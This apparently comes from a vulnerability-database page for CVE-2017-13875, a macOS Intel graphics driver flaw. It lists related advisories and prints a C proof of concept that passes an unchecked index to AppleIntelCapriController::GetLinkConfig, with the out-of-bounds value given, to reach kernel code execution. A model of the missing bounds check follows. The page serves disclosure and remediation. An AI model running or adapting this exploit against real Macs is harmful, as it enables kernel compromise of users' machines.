| Title | Published | Reporter |
|---|---|---|
| macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkCo | 13 Dec 2017 00:00 | zdt |
| macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown) | 10 Apr 2019 00:00 | nessus |
| macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown) | 7 Dec 2017 00:00 | nessus |
| About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan | 6 Dec 2017 00:00 | apple |
| About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support | 27 Jul 2020 08:21 | apple |
| CVE-2017-13875 | 12 Dec 2017 00:00 | circl |
| Apple macOS High Sierra Intel Graphics Driver Out-of-Bounds Read Vulnerability | 7 Dec 2017 00:00 | cnvd |
| CVE-2017-13875 | 25 Dec 2017 21:00 | cve |
| CVE-2017-13875 | 25 Dec 2017 21:00 | cvelist |
| EUVD-2017-5390 | 7 Oct 2025 00:30 | euvd |

```c
// ianbeer
// build: clang -o capri_link_config capri_link_config.c -framework IOKit
#if 0
MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig

AppleIntelCapriController::GetLinkConfig trusts a user-supplied value in the structure input which it uses to index
a small table of pointers without bounds checking. The OOB-read pointer is passed to AppleIntelFramebuffer::validateDisplayMode
which will read a pointer to a C++ object from that buffer (at offset 2138h) and call a virtual method allowing trivial kernel code execution.

Tested on MacOS 10.13 (17A365) on MacBookAir5,2
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <IOKit/IOKitLib.h>

int main(int argc, char** argv){
  kern_return_t err;

  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }

  uint64_t inputScalar[16];
  uint64_t inputScalarCnt = 0;

  char inputStruct[4096];
  size_t inputStructCnt = 8;
  //*(uint64_t*)inputStruct = 0x12345678; // crash
  *(uint64_t*)inputStruct = 0x37; // oob call

  uint64_t outputScalar[16];
  uint32_t outputScalarCnt = 0;

  char outputStruct[4096];
  size_t outputStructCnt = 4096;

  err = IOConnectCallMethod(
    conn,
    0x921, // GetLinkConfig
    inputScalar,
    inputScalarCnt,
    inputStruct,
    inputStructCnt,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

  return 0;
}
```
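
The missing check described in the report, shown as an added example in a user-space model; this is not Apple's driver code and not part of the original PoC. The table size of 4, the `link_state` layout and all function and constant names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the pattern in the report; not Apple's code. */
#define LINK_TABLE_COUNT 4   /* assumed size of the "small table" */

enum { LC_OK = 0, LC_BAD_SIZE = -1, LC_BAD_INDEX = -2, LC_NO_ENTRY = -3 };

struct link_state { uint32_t lanes; uint32_t rate; };   /* constructed */

static struct link_state g_links[2] = { {4, 270}, {2, 162} };
/* Two slots are left empty, as in a partly populated port table. */
static struct link_state *g_link_table[LINK_TABLE_COUNT] = {
    &g_links[0], &g_links[1], NULL, NULL
};

/* Handler that validates the caller-controlled struct before using it. */
int get_link_config_checked(const void *in, size_t in_len,
                            struct link_state *out)
{
    uint64_t index;

    if (in == NULL || out == NULL || in_len < sizeof(index))
        return LC_BAD_SIZE;            /* struct too short to hold the index */
    memcpy(&index, in, sizeof(index)); /* no alignment or aliasing assumptions */

    /* Compare at full 64-bit width, before any narrowing conversion,
       so a large value cannot be truncated into the valid range. */
    if (index >= LINK_TABLE_COUNT)
        return LC_BAD_INDEX;

    if (g_link_table[index] == NULL)
        return LC_NO_ENTRY;            /* never pass an empty slot onward */

    *out = *g_link_table[index];       /* copy out; no table pointer escapes */
    return LC_OK;
}

/* Replays a single 8-byte struct input, as the PoC above supplies. */
int probe_index(uint64_t value)
{
    struct link_state out;
    return get_link_config_checked(&value, sizeof(value), &out);
}
```

Both values the PoC places in the structure input (`0x37` and `0x12345678`) are rejected with `LC_BAD_INDEX` before any table access happens.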